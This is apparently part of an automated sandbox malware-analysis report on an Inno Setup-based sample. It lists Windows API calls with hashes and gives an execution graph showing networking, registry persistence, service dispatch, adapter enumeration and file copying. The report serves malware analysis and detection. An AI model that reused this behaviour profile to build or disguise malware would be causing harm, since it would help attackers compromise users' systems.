                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                            • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                              • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                            • String ID: 0nI
                                                                                            • API String ID: 3798668922-794067871
                                                                                            • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                            • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                            • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                            • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$EnumQuery
                                                                                            • String ID: Inno Setup: No Icons
                                                                                            • API String ID: 1576479698-2016326496
                                                                                            • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                            • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                            • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                            • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLast
                                                                                            • String ID: T$H
                                                                                            • API String ID: 1799206407-488339322
                                                                                            • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                            • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                            • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                            • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: T$H
                                                                                            • API String ID: 2018770650-488339322
                                                                                            • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                            • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                            • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                            • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                            APIs
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                            • String ID: T$H
                                                                                            • API String ID: 377330604-488339322
                                                                                            • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                            • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                            • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                            • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                            APIs
                                                                                              • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(739B0000,00481A2F), ref: 0047D0E2
                                                                                              • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                              • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                            Strings
                                                                                            • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                            • API String ID: 1717587489-3199836293
                                                                                            • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                            • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                            • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                            • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                            • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                            • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                            • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.5%
                                                                                            Dynamic/Decrypted Code Coverage:69%
                                                                                            Signature Coverage:18.8%
                                                                                            Total number of Nodes:464
                                                                                            Total number of Limit Nodes:29
                                                                                            execution_graph 61163 402a20 GetVersion 61188 403b64 HeapCreate 61163->61188 61165 402a7f 61166 402a84 61165->61166 61167 402a8c 61165->61167 61266 402b3b 8 API calls 61166->61266 61200 403844 61167->61200 61170 402a94 GetCommandLineA 61214 403712 61170->61214 61175 402aae 61246 40340c 61175->61246 61177 402ab3 61178 402ab8 GetStartupInfoA 61177->61178 61259 4033b4 61178->61259 61180 402aca GetModuleHandleA 61263 401f06 61180->61263 61189 403b84 61188->61189 61190 403bba 61188->61190 61267 403a1c 19 API calls 61189->61267 61190->61165 61192 403b89 61193 403b93 61192->61193 61195 403ba0 61192->61195 61268 403f3b HeapAlloc 61193->61268 61196 403bbd 61195->61196 61269 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61195->61269 61196->61165 61197 403b9d 61197->61196 61199 403bae HeapDestroy 61197->61199 61199->61190 61270 402b5f 61200->61270 61202 403863 GetStartupInfoA 61210 403974 61202->61210 61213 4038af 61202->61213 61206 40399b GetStdHandle 61209 4039a9 GetFileType 61206->61209 61206->61210 61207 4039db SetHandleCount 61207->61170 61208 402b5f 12 API calls 61208->61213 61209->61210 61210->61206 61210->61207 61211 403920 61211->61210 61212 403942 GetFileType 61211->61212 61212->61211 61213->61208 61213->61210 61213->61211 61215 403760 61214->61215 61216 40372d GetEnvironmentStringsW 61214->61216 61218 403735 61215->61218 61219 403751 61215->61219 61217 403741 GetEnvironmentStrings 61216->61217 61216->61218 61217->61219 61220 402aa4 61217->61220 61221 403779 WideCharToMultiByte 61218->61221 61222 40376d GetEnvironmentStringsW 61218->61222 61219->61220 61223 4037f3 GetEnvironmentStrings 61219->61223 61224 4037ff 61219->61224 61237 4034c5 61220->61237 61226 4037ad 61221->61226 61227 4037df FreeEnvironmentStringsW 61221->61227 61222->61220 61222->61221 61223->61220 61223->61224 61228 402b5f 12 API calls 61224->61228 61229 402b5f 12 API calls 61226->61229 61227->61220 61235 40381a 61228->61235 61230 4037b3 61229->61230 61230->61227 61231 4037bc WideCharToMultiByte 61230->61231 61233 4037d6 61231->61233 61234 4037cd 61231->61234 61232 403830 FreeEnvironmentStringsA 61232->61220 61233->61227 61279 402c11 61234->61279 61235->61232 61238 4034d7 61237->61238 61239 4034dc GetModuleFileNameA 61237->61239 61292 405d24 19 API calls 61238->61292 61241 4034ff 61239->61241 61242 402b5f 12 API calls 61241->61242 61243 403520 61242->61243 61244 403530 61243->61244 61293 402b16 7 API calls 61243->61293 61244->61175 61247 403419 61246->61247 61249 40341e 61246->61249 61294 405d24 19 API calls 61247->61294 61250 402b5f 12 API calls 61249->61250 61251 40344b 61250->61251 61258 40345f 61251->61258 61295 402b16 7 API calls 61251->61295 61253 4034a2 61254 402c11 7 API calls 61253->61254 61255 4034ae 61254->61255 61255->61177 61256 402b5f 12 API calls 61256->61258 61258->61253 61258->61256 61296 402b16 7 API calls 61258->61296 61260 4033bd 61259->61260 61262 4033c2 61259->61262 61297 405d24 19 API calls 61260->61297 61262->61180 61264 4020ab GetModuleHandleA 61263->61264 61267->61192 61268->61197 61269->61197 61274 402b71 61270->61274 61273 402b16 7 API calls 61273->61202 61275 402b6e 61274->61275 61277 402b78 61274->61277 61275->61202 61275->61273 61277->61275 61278 402b9d 12 API calls 61277->61278 61278->61277 61280 402c1d 61279->61280 61288 402c39 61279->61288 61281 402c27 61280->61281 61282 402c3d 61280->61282 61284 402c69 HeapFree 61281->61284 61285 402c33 61281->61285 61283 402c68 61282->61283 61287 402c57 61282->61287 61283->61284 61284->61288 61290 403fae VirtualFree VirtualFree HeapFree 61285->61290 61291 404a3f VirtualFree HeapFree VirtualFree 61287->61291 61288->61233 61290->61288 61291->61288 61292->61239 61293->61244 61294->61249 61295->61258 61296->61258 61297->61262 61298 401842 VirtualAlloc 61299 40de72 61298->61299 61300 401742 61301 40d57b RegQueryValueExA 61300->61301 61302 2d7ca75 CloseHandle 61303 2d84ca4 61302->61303 61303->61303 61304 401c85 61305 40d823 RegCreateKeyExA 61304->61305 61307 402188 LoadLibraryExA 61308 401f20 61307->61308 61308->61307 61309 40dab3 61308->61309 61310 401769 61311 40176e 61310->61311 61312 40dd78 CopyFileA 61311->61312 61313 40dee9 61314 40de86 61313->61314 61315 40df4c StartServiceCtrlDispatcherA 61313->61315 61314->61315 61316 40e028 lstrcmpiW 61315->61316 61317 2d45e5e RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61387 2d442c7 61317->61387 61319 2d45ecb GetTickCount 61320 2d459fa 59 API calls 61319->61320 61321 2d45ee8 GetVersionExA 61320->61321 61322 2d45f29 _memset 61321->61322 61323 2d51fbc _malloc 59 API calls 61322->61323 61324 2d45f36 61323->61324 61325 2d51fbc _malloc 59 API calls 61324->61325 61326 2d45f46 61325->61326 61327 2d51fbc _malloc 59 API calls 61326->61327 61328 2d45f51 61327->61328 61329 2d51fbc _malloc 59 API calls 61328->61329 61330 2d45f5c 61329->61330 61331 2d51fbc _malloc 59 API calls 61330->61331 61332 2d45f67 61331->61332 61333 2d51fbc _malloc 59 API calls 61332->61333 61334 2d45f72 61333->61334 61335 2d51fbc _malloc 59 API calls 61334->61335 61336 2d45f7d 61335->61336 61337 2d51fbc _malloc 59 API calls 61336->61337 61338 2d45f89 6 API calls 61337->61338 61339 2d45fd6 _memset 61338->61339 61340 2d45fef RtlEnterCriticalSection RtlLeaveCriticalSection 61339->61340 61341 2d51fbc _malloc 59 API calls 61340->61341 61342 2d4602b 61341->61342 61343 2d51fbc _malloc 59 API calls 61342->61343 61344 2d46039 61343->61344 61345 2d51fbc _malloc 59 API calls 61344->61345 61346 2d46040 61345->61346 61347 2d51fbc _malloc 59 API calls 61346->61347 61348 2d46061 QueryPerformanceCounter Sleep 61347->61348 61349 2d51fbc _malloc 59 API calls 61348->61349 61350 2d46087 61349->61350 61351 2d51fbc _malloc 59 API calls 61350->61351 61369 2d46097 _memset 61351->61369 61352 2d46104 Sleep 61353 2d4610a RtlEnterCriticalSection RtlLeaveCriticalSection 61352->61353 61353->61369 61354 2d4649e RtlEnterCriticalSection RtlLeaveCriticalSection 61355 2d5134c 66 API calls 61354->61355 61355->61369 61356 2d51fbc _malloc 59 API calls 61357 2d46540 RtlEnterCriticalSection RtlLeaveCriticalSection 61356->61357 61357->61369 61358 2d467f7 RtlEnterCriticalSection RtlLeaveCriticalSection 61358->61369 61359 2d45c11 59 API calls 61359->61369 61360 2d51428 _sprintf 84 API calls 61360->61369 61361 2d41ba7 210 API calls 61361->61369 61362 2d4695c RtlEnterCriticalSection 61363 2d46989 RtlLeaveCriticalSection 61362->61363 61362->61369 61365 2d43c67 72 API calls 61363->61365 61364 2d51fbc _malloc 59 API calls 61364->61369 61365->61369 61366 2d5134c 66 API calls 61366->61369 61367 2d43d7e 64 API calls 61367->61369 61368 2d4733f 89 API calls 61368->61369 61369->61352 61369->61353 61369->61354 61369->61356 61369->61358 61369->61359 61369->61360 61369->61361 61369->61362 61369->61363 61369->61364 61369->61366 61369->61367 61369->61368 61370 2d49729 73 API calls 61369->61370 61371 2d48007 88 API calls 61369->61371 61372 2d51f84 _free 59 API calls 61369->61372 61373 2d473ee 71 API calls 61369->61373 61374 2d527c5 _Allocate 60 API calls 61369->61374 61375 2d51860 _swscanf 59 API calls 61369->61375 61376 2d433b2 86 API calls 61369->61376 61377 2d4873b 212 API calls 61369->61377 61378 2d49853 60 API calls 61369->61378 61379 2d525f6 65 API calls _strtok 61369->61379 61380 2d45119 103 API calls 61369->61380 61381 2d4c11b 73 API calls 61369->61381 61382 2d49c13 210 API calls 61369->61382 61383 2d46774 Sleep 61369->61383 61385 2d4676f shared_ptr 61369->61385 61370->61369 61371->61369 61372->61369 61373->61369 61374->61369 61375->61369 61376->61369 61377->61369 61378->61369 61379->61369 61380->61369 61381->61369 61382->61369 61384 2d50900 GetProcessHeap HeapFree 61383->61384 61384->61385 61385->61369 61385->61383 61386 2d44100 GetProcessHeap HeapFree 61385->61386 61386->61385 61388 2db4616 61389 2dc7646 InternetOpenA 61388->61389 61391 40232e Sleep 61392 40209b 61391->61392 61393 40d55c GetStartupInfoA 61392->61393 61394 401f74 61392->61394 61393->61394 61395 40d720 61394->61395 61398 401301 FindResourceA 61394->61398 61397 40dc0d 61399 401367 SizeofResource 61398->61399 61400 401360 61398->61400 61399->61400 61401 401386 LoadResource LockResource GlobalAlloc 61399->61401 61400->61397 61402 4013cc 61401->61402 61403 40141f GetTickCount 61402->61403 61405 40142a GlobalAlloc 61403->61405 61405->61400 61406 4016cf 61410 401897 61406->61410 61411 401d22 61410->61411 61412 40d55c GetStartupInfoA 61411->61412 61413 401f74 61411->61413 61412->61413 61414 40d720 61413->61414 61415 401301 7 API calls 61413->61415 61416 40dc0d 61415->61416 61417 2d4e8a7 CreateFileA 61418 2d4e9a3 61417->61418 61422 2d4e8d8 61417->61422 61419 2d4e8f0 DeviceIoControl 61419->61422 61420 2d4e999 CloseHandle 61420->61418 61421 2d4e965 GetLastError 61421->61420 61421->61422 61422->61419 61422->61420 61422->61421 61422->61422 61424 2d527c5 61422->61424 61428 2d527cd 61424->61428 61426 2d527e7 61426->61422 61428->61426 61429 2d527eb std::exception::exception 61428->61429 61432 2d51fbc 61428->61432 61449 2d56e73 RtlDecodePointer 61428->61449 61450 2d531ca RaiseException 61429->61450 61431 2d52815 61433 2d52037 61432->61433 61441 2d51fc8 61432->61441 61457 2d56e73 RtlDecodePointer 61433->61457 61435 2d5203d 61458 2d54acb 59 API calls __getptd_noexit 61435->61458 61438 2d51ffb RtlAllocateHeap 61438->61441 61448 2d5202f 61438->61448 61440 2d51fd3 61440->61441 61451 2d57291 59 API calls 2 library calls 61440->61451 61452 2d572ee 59 API calls 8 library calls 61440->61452 61453 2d56eda GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61440->61453 61441->61438 61441->61440 61442 2d52023 61441->61442 61446 2d52021 61441->61446 61454 2d56e73 RtlDecodePointer 61441->61454 61455 2d54acb 59 API calls __getptd_noexit 61442->61455 61456 2d54acb 59 API calls __getptd_noexit 61446->61456 61448->61428 61449->61428 61450->61431 61451->61440 61452->61440 61454->61441 61455->61446 61456->61448 61457->61435 61458->61448 61459 401b93 RegSetValueExA RegCloseKey 61460 40d143 61459->61460 61461 401e96 CreateDirectoryA 61462 40d036 61461->61462 61463 401878 RegCloseKey 61464 40dcf0 61463->61464 61464->61464 61465 2d7c5af SHGetSpecialFolderPathA 61466 2d807ce 61465->61466 61467 40d9d8 RegOpenKeyExA 61468 2d4104d 61473 2d523b4 61468->61473 61479 2d522b8 61473->61479 61475 2d41057 61476 2d41aa9 InterlockedIncrement 61475->61476 61477 2d41ac5 WSAStartup InterlockedExchange 61476->61477 61478 2d4105c 61476->61478 61477->61478 61480 2d522c4 CallCatchBlock 61479->61480 61487 2d57150 61480->61487 61486 2d522eb CallCatchBlock 61486->61475 61504 2d574ab 61487->61504 61489 2d522cd 61490 2d522fc RtlDecodePointer RtlDecodePointer 61489->61490 61491 2d52329 61490->61491 61492 2d522d9 61490->61492 61491->61492 61513 2d57d1d 60 API calls 2 library calls 61491->61513 61501 2d522f6 61492->61501 61494 2d5238c RtlEncodePointer RtlEncodePointer 61494->61492 61495 2d52360 61495->61492 61500 2d5237a RtlEncodePointer 61495->61500 61515 2d576b9 62 API calls 2 library calls 61495->61515 61496 2d5233b 61496->61494 61496->61495 61514 2d576b9 62 API calls 2 library calls 61496->61514 61499 2d52374 61499->61492 61499->61500 61500->61494 61516 2d57159 61501->61516 61505 2d574bc 61504->61505 61506 2d574cf RtlEnterCriticalSection 61504->61506 61511 2d57533 59 API calls 10 library calls 61505->61511 61506->61489 61508 2d574c2 61508->61506 61512 2d56ffd 59 API calls 3 library calls 61508->61512 61511->61508 61513->61496 61514->61495 61515->61499 61519 2d57615 RtlLeaveCriticalSection 61516->61519 61518 2d522fb 61518->61486 61519->61518 61520 2d7c80e 61521 2d7c812 61520->61521 61524 2d4e9ab LoadLibraryA 61521->61524 61525 2d4e9d4 GetProcAddress 61524->61525 61526 2d4ea8e 61524->61526 61527 2d4ea87 FreeLibrary 61525->61527 61530 2d4e9e8 61525->61530 61527->61526 61528 2d4e9fa GetAdaptersInfo 61528->61530 61529 2d4ea82 61529->61527 61530->61528 61530->61529 61531 2d527c5 _Allocate 60 API calls 61530->61531 61531->61530 61532 40207b 61536 2d52988 61532->61536 61537 2d52996 61536->61537 61538 2d52991 61536->61538 61542 2d529ab 61537->61542 61550 2d5918c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 61538->61550 61541 402080 Sleep 61543 2d529b7 CallCatchBlock 61542->61543 61547 2d52a05 ___DllMainCRTStartup 61543->61547 61549 2d52a62 CallCatchBlock 61543->61549 61551 2d52816 61543->61551 61545 2d52a3f 61546 2d52816 __CRT_INIT@12 138 API calls 61545->61546 61545->61549 61546->61549 61547->61545 61548 2d52816 __CRT_INIT@12 138 API calls 61547->61548 61547->61549 61548->61545 61549->61541 61550->61537 61552 2d52822 CallCatchBlock 61551->61552 61553 2d528a4 61552->61553 61554 2d5282a 61552->61554 61556 2d5290d 61553->61556 61557 2d528a8 61553->61557 61599 2d56e56 GetProcessHeap 61554->61599 61559 2d52970 61556->61559 61560 2d52912 61556->61560 61562 2d528c9 61557->61562 61570 2d52833 CallCatchBlock __CRT_INIT@12 61557->61570 61688 2d57019 59 API calls _doexit 61557->61688 61558 2d5282f 61558->61570 61600 2d54a04 61558->61600 61559->61570 61719 2d54894 59 API calls 2 library calls 61559->61719 61693 2d57d8b 61560->61693 61689 2d56ef0 61 API calls _free 61562->61689 61564 2d5291d 61564->61570 61696 2d5762a 61564->61696 61568 2d5283f __RTC_Initialize 61568->61570 61577 2d5284f GetCommandLineA 61568->61577 61569 2d528ce 61572 2d528df __CRT_INIT@12 61569->61572 61690 2d58e2a 60 API calls _free 61569->61690 61570->61547 61692 2d528f8 62 API calls __mtterm 61572->61692 61576 2d528da 61691 2d54a7a 62 API calls 2 library calls 61576->61691 61621 2d59228 GetEnvironmentStringsW 61577->61621 61581 2d52946 61583 2d52964 61581->61583 61584 2d5294c 61581->61584 61713 2d51f84 61583->61713 61703 2d54951 61584->61703 61588 2d52869 61597 2d5286d 61588->61597 61653 2d58e7c 61588->61653 61589 2d52954 GetCurrentThreadId 61589->61570 61593 2d5288d 61593->61570 61687 2d58e2a 60 API calls _free 61593->61687 61686 2d54a7a 62 API calls 2 library calls 61597->61686 61599->61558 61720 2d570c0 36 API calls 2 library calls 61600->61720 61602 2d54a09 61721 2d575dc InitializeCriticalSectionAndSpinCount ___lock_fhandle 61602->61721 61604 2d54a0e 61605 2d54a12 61604->61605 61723 2d57d4e TlsAlloc 61604->61723 61722 2d54a7a 62 API calls 2 library calls 61605->61722 61608 2d54a17 61608->61568 61609 2d54a24 61609->61605 61610 2d54a2f 61609->61610 61611 2d5762a __calloc_crt 59 API calls 61610->61611 61612 2d54a3c 61611->61612 61613 2d54a71 61612->61613 61724 2d57daa TlsSetValue 61612->61724 61725 2d54a7a 62 API calls 2 library calls 61613->61725 61616 2d54a50 61616->61613 61618 2d54a56 61616->61618 61617 2d54a76 61617->61568 61619 2d54951 __initptd 59 API calls 61618->61619 61620 2d54a5e GetCurrentThreadId 61619->61620 61620->61568 61625 2d5923b WideCharToMultiByte 61621->61625 61627 2d5285f 61621->61627 61623 2d592a5 FreeEnvironmentStringsW 61623->61627 61624 2d5926e 61726 2d57672 59 API calls 2 library calls 61624->61726 61625->61623 61625->61624 61634 2d58b76 61627->61634 61628 2d59274 61628->61623 61629 2d5927b WideCharToMultiByte 61628->61629 61630 2d59291 61629->61630 61631 2d5929a FreeEnvironmentStringsW 61629->61631 61632 2d51f84 _free 59 API calls 61630->61632 61631->61627 61633 2d59297 61632->61633 61633->61631 61635 2d58b82 CallCatchBlock 61634->61635 61636 2d574ab __lock 59 API calls 61635->61636 61637 2d58b89 61636->61637 61638 2d5762a __calloc_crt 59 API calls 61637->61638 61640 2d58b9a 61638->61640 61639 2d58c05 GetStartupInfoW 61647 2d58c1a 61639->61647 61650 2d58d49 61639->61650 61640->61639 61641 2d58ba5 CallCatchBlock @_EH4_CallFilterFunc@8 61640->61641 61641->61588 61642 2d58e11 61729 2d58e21 RtlLeaveCriticalSection _doexit 61642->61729 61644 2d5762a __calloc_crt 59 API calls 61644->61647 61645 2d58d96 GetStdHandle 61645->61650 61646 2d58da9 GetFileType 61646->61650 61647->61644 61649 2d58c68 61647->61649 61647->61650 61648 2d58c9c GetFileType 61648->61649 61649->61648 61649->61650 61727 2d57dcc InitializeCriticalSectionAndSpinCount 61649->61727 61650->61642 61650->61645 61650->61646 61728 2d57dcc InitializeCriticalSectionAndSpinCount 61650->61728 